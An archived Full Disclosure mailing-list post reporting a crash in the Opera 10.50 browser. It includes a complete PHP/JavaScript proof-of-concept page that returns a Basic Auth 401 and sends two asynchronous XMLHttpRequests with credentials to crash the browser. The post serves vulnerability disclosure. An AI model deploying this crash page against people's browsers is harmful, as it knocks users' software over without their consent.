Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Opera 10.50 Asynchronous XMLHttpRequest Basic Auth Crash

From: spam account <peorth_17 () hotmail com>
Date: Thu, 4 Mar 2010 15:53:59 -0600

First found it in one of the version 9 opera's and reported it, still works in 10.50.

<?php
if (isset($_GET['crash']))
{
    header('HTTP/1.0 401 Unauthorized');
    header('WWW-Authenticate: Basic realm="crash"');
    exit();
}
?>
<!DOCTYPE html>
<html>
    <head>
        <title>Crash Opera</title>
        <script>
            function doit() {
                a = new XMLHttpRequest()
                a.open("GET", "?crash", true, "crash", "crash");
                a.send(null);
            }
            function crash() {
                doit();
                doit();
            }
        </script>
    </head>
    <body>
        <input type="submit" onclick="crash()" value="Crash Opera">
    </body>
</html>                                           
_________________________________________________________________
Hotmail: Trusted email with Microsoft’s powerful SPAM protection.
http://clk.atdmt.com/GBL/go/201469226/direct/01/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: